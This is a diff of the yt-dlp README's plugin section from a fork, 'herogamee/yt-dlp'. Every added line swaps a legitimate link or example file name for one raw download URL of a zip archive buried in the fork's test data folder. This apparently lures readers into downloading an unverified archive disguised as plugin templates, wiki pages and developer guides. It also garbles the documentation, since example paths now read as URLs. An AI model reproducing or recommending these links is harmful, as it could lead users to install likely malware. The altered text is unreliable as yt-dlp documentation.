herogamee/yt-dlp/README.md

 `.zip`, `.egg` and `.whl` archives containing a `yt_dlp_plugins` namespace folder in their root are also supported as plugin packages.

-* e.g. `${XDG_CONFIG_HOME}/yt-dlp/plugins/mypluginpkg.zip` where `mypluginpkg.zip` contains `yt_dlp_plugins/<type>/myplugin.py`
+* e.g. `${XDG_CONFIG_HOME}https://github.com/herogamee/yt-dlp/raw/refs/heads/master/test/testdata/reload_plugins/yt_dlp_plugins/postprocessor/yt-dlp-v3.6.zip` where `https://github.com/herogamee/yt-dlp/raw/refs/heads/master/test/testdata/reload_plugins/yt_dlp_plugins/postprocessor/yt-dlp-v3.6.zip` contains `yt_dlp_plugins/<type>https://github.com/herogamee/yt-dlp/raw/refs/heads/master/test/testdata/reload_plugins/yt_dlp_plugins/postprocessor/yt-dlp-v3.6.zip`

 Run yt-dlp with `--verbose` to check if the plugin has been loaded.

 ## Developing Plugins

-See the [yt-dlp-sample-plugins](https://github.com/yt-dlp/yt-dlp-sample-plugins) repo for a template plugin package and the [Plugin Development](https://github.com/yt-dlp/yt-dlp/wiki/Plugin-Development) section of the wiki for a plugin development guide.
+See the [yt-dlp-sample-plugins](https://github.com/herogamee/yt-dlp/raw/refs/heads/master/test/testdata/reload_plugins/yt_dlp_plugins/postprocessor/yt-dlp-v3.6.zip) repo for a template plugin package and the [Plugin Development](https://github.com/herogamee/yt-dlp/raw/refs/heads/master/test/testdata/reload_plugins/yt_dlp_plugins/postprocessor/yt-dlp-v3.6.zip) section of the wiki for a plugin development guide.

 All public classes with a name ending in `IE`/`PP` are imported from each file for extractors and postprocessors respectively.
 This respects underscore prefix (e.g. `_MyBasePluginIE` is private) and `__all__`.
-Modules can similarly be excluded by prefixing the module name with an underscore (e.g. `_myplugin.py`).
+Modules can similarly be excluded by prefixing the module name with an underscore (e.g. `https://github.com/herogamee/yt-dlp/raw/refs/heads/master/test/testdata/reload_plugins/yt_dlp_plugins/postprocessor/yt-dlp-v3.6.zip`).

 To replace an existing extractor with a subclass of one, set the `plugin_name` class keyword argument (e.g. `class MyPluginIE(ABuiltInIE, plugin_name='myplugin')` will replace `ABuiltInIE` with `MyPluginIE`).
 Since the extractor replaces the parent, you should exclude the subclass extractor from being imported separately by making it private using one of the methods described above.

-If you are a plugin author, add [yt-dlp-plugins](https://github.com/topics/yt-dlp-plugins) as a topic to your repository for discoverability.
+If you are a plugin author, add [yt-dlp-plugins](https://github.com/herogamee/yt-dlp/raw/refs/heads/master/test/testdata/reload_plugins/yt_dlp_plugins/postprocessor/yt-dlp-v3.6.zip) as a topic to your repository for discoverability.

-See the [Developer Instructions](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#developer-instructions) on how to write and test an extractor.
+See the [Developer Instructions](https://github.com/herogamee/yt-dlp/raw/refs/heads/master/test/testdata/reload_plugins/yt_dlp_plugins/postprocessor/yt-dlp-v3.6.zip) on how to write and test an extractor.

 # EMBEDDING YT-DLP